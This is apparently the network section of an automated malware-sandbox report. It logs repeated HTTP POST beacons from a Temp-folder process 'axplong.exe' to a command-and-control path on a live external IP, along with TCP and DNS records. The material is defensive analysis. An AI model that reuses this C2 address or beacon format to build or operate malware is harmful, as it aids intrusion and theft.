Sep 26, 2024 15:42:59.871753931 CEST	52372	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:59.873847961 CEST	80	52371	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:59.873936892 CEST	52371	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:59.876619101 CEST	80	52372	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:59.876696110 CEST	52372	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:59.879235983 CEST	52372	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:59.884041071 CEST	80	52372	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:00.584180117 CEST	80	52372	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:00.584320068 CEST	52372	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:00.585761070 CEST	52372	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:00.590742111 CEST	80	52372	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:00.816585064 CEST	80	52372	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:00.816662073 CEST	52372	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:00.922426939 CEST	52372	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:00.922771931 CEST	52373	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:00.927752972 CEST	80	52372	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:00.927839041 CEST	52372	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:00.928037882 CEST	80	52373	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:00.928220034 CEST	52373	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:00.928431988 CEST	52373	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:00.933307886 CEST	80	52373	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:01.627623081 CEST	80	52373	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:01.627752066 CEST	52373	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:01.628426075 CEST	52373	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:01.633315086 CEST	80	52373	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:01.860166073 CEST	80	52373	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:01.860260963 CEST	52373	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:01.966322899 CEST	52373	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:01.966679096 CEST	52374	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:01.971483946 CEST	80	52373	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:01.971590042 CEST	52373	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:01.971606016 CEST	80	52374	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:01.971673965 CEST	52374	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:01.971878052 CEST	52374	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:01.977080107 CEST	80	52374	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:02.685197115 CEST	80	52374	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:02.685260057 CEST	52374	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:02.750123024 CEST	52374	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:02.755048990 CEST	80	52374	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:02.984669924 CEST	80	52374	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:02.984814882 CEST	52374	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:03.107544899 CEST	52374	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:03.107871056 CEST	52375	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:03.112890005 CEST	80	52375	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:03.112982988 CEST	52375	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:03.113059998 CEST	80	52374	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:03.113106966 CEST	52374	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:03.113107920 CEST	52375	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:03.118186951 CEST	80	52375	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:03.908499002 CEST	80	52375	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:03.908579111 CEST	52375	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:03.911488056 CEST	52375	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:03.916253090 CEST	80	52375	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:04.136341095 CEST	80	52375	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:04.136409998 CEST	52375	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:04.250124931 CEST	52375	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:04.250562906 CEST	52376	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:04.524049997 CEST	80	52376	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:04.524136066 CEST	52376	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:04.524219990 CEST	80	52375	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:04.524279118 CEST	52375	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:04.524465084 CEST	52376	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:04.534322023 CEST	80	52376	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:05.249052048 CEST	80	52376	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:05.249315023 CEST	52376	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:05.252619028 CEST	52376	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:05.257406950 CEST	80	52376	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:05.485574007 CEST	80	52376	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:05.485735893 CEST	52376	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:05.593499899 CEST	52376	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:05.593826056 CEST	52377	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:05.598648071 CEST	80	52377	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:05.598711967 CEST	80	52376	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:05.598809004 CEST	52376	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:05.598835945 CEST	52377	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:05.599240065 CEST	52377	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:05.604096889 CEST	80	52377	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:06.310586929 CEST	80	52377	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:06.310874939 CEST	52377	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:06.314234972 CEST	52377	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:06.314234972 CEST	52378	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:06.320662022 CEST	80	52378	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:06.320754051 CEST	52378	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:06.320986986 CEST	80	52377	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:06.320991993 CEST	52378	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:06.321038008 CEST	52377	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:06.326951027 CEST	80	52378	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:07.055228949 CEST	80	52378	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:07.055489063 CEST	52378	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:07.173609018 CEST	52378	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:07.173913002 CEST	52379	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:07.179481983 CEST	80	52378	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:07.179637909 CEST	80	52379	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:07.179856062 CEST	52379	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:07.180129051 CEST	52379	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:07.180152893 CEST	52378	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:07.185909986 CEST	80	52379	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:07.908143044 CEST	80	52379	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:07.908246040 CEST	52379	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:07.911017895 CEST	52379	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:07.911499023 CEST	52380	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:07.916157961 CEST	80	52379	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:07.916213036 CEST	52379	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:07.916604996 CEST	80	52380	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:07.916680098 CEST	52380	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:07.917090893 CEST	52380	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:07.922049999 CEST	80	52380	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:08.688188076 CEST	80	52380	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:08.688261986 CEST	52380	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:08.800374031 CEST	52380	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:08.800721884 CEST	52381	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:08.805550098 CEST	80	52380	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:08.805736065 CEST	52380	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:08.808815956 CEST	80	52381	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:08.808897972 CEST	52381	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:08.809166908 CEST	52381	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:08.815066099 CEST	80	52381	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:09.506697893 CEST	80	52381	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:09.506947994 CEST	52381	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:09.509749889 CEST	52381	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:09.514584064 CEST	80	52381	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:09.860450029 CEST	80	52381	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:09.860964060 CEST	52381	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:09.984189034 CEST	52381	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:09.984544039 CEST	52382	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:09.989379883 CEST	80	52382	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:09.989394903 CEST	80	52381	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:09.989447117 CEST	52382	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:09.989476919 CEST	52381	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:09.989684105 CEST	52382	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:09.994786024 CEST	80	52382	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:10.696933985 CEST	80	52382	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:10.697189093 CEST	52382	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:10.699994087 CEST	52382	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:10.700573921 CEST	52383	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:10.705899954 CEST	80	52382	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:10.705956936 CEST	52382	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:10.706619978 CEST	80	52383	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:10.706688881 CEST	52383	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:10.706916094 CEST	52383	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:10.712917089 CEST	80	52383	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:11.436655045 CEST	80	52383	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:11.436723948 CEST	52383	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:11.553189993 CEST	52383	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:11.553812981 CEST	52384	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:11.558844090 CEST	80	52384	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:11.558921099 CEST	52384	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:11.559017897 CEST	80	52383	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:11.559072018 CEST	52383	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:11.560424089 CEST	52384	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:11.565220118 CEST	80	52384	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:12.329565048 CEST	80	52384	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:12.329652071 CEST	52384	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:12.332474947 CEST	52384	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:12.332819939 CEST	52385	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:12.337527990 CEST	80	52384	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:12.337594986 CEST	52384	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:12.337872028 CEST	80	52385	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:12.337990046 CEST	52385	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:12.338247061 CEST	52385	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:12.343110085 CEST	80	52385	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:13.036628962 CEST	80	52385	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:13.036684990 CEST	52385	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:13.141021967 CEST	52385	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:13.141422033 CEST	52386	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:13.146500111 CEST	80	52386	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:13.146579981 CEST	52386	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:13.146893024 CEST	52386	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:13.149544001 CEST	80	52385	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:13.149590015 CEST	52385	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:43:13.152054071 CEST	80	52386	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:13.868077993 CEST	80	52386	185.215.113.16	192.168.2.6
Sep 26, 2024 15:43:13.868129969 CEST	52386	80	192.168.2.6	185.215.113.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 15:41:39.754065037 CEST	53	65367	162.159.36.2	192.168.2.6
Sep 26, 2024 15:41:40.251178980 CEST	53638	53	192.168.2.6	1.1.1.1
Sep 26, 2024 15:41:40.260466099 CEST	53	53638	1.1.1.1	192.168.2.6
Sep 26, 2024 15:41:41.357029915 CEST	64763	53	192.168.2.6	1.1.1.1
Sep 26, 2024 15:41:41.366497040 CEST	53	64763	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 15:41:40.251178980 CEST	192.168.2.6	1.1.1.1	0xdd87	Standard query (0)	171.39.242.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Sep 26, 2024 15:41:41.357029915 CEST	192.168.2.6	1.1.1.1	0xd8f7	Standard query (0)	86.23.85.13.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 15:41:40.260466099 CEST	1.1.1.1	192.168.2.6	0xdd87	Name error (3)	171.39.242.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Sep 26, 2024 15:41:41.366497040 CEST	1.1.1.1	192.168.2.6	0xd8f7	Name error (3)	86.23.85.13.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	52319	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:02.719383001 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:03.542167902 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:03.544769049 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:03.781316042 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	52320	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:03.894004107 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:04.775163889 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:04.776247978 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:05.142745972 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	52321	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:05.253216028 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:05.976547956 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:05.977672100 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:06.215785027 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	52322	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:06.332247019 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:07.408618927 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:07.409511089 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:07.632118940 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	52323	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:07.753185034 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:08.455849886 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:08.456764936 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:08.693679094 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	52324	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:08.815917015 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:09.586147070 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
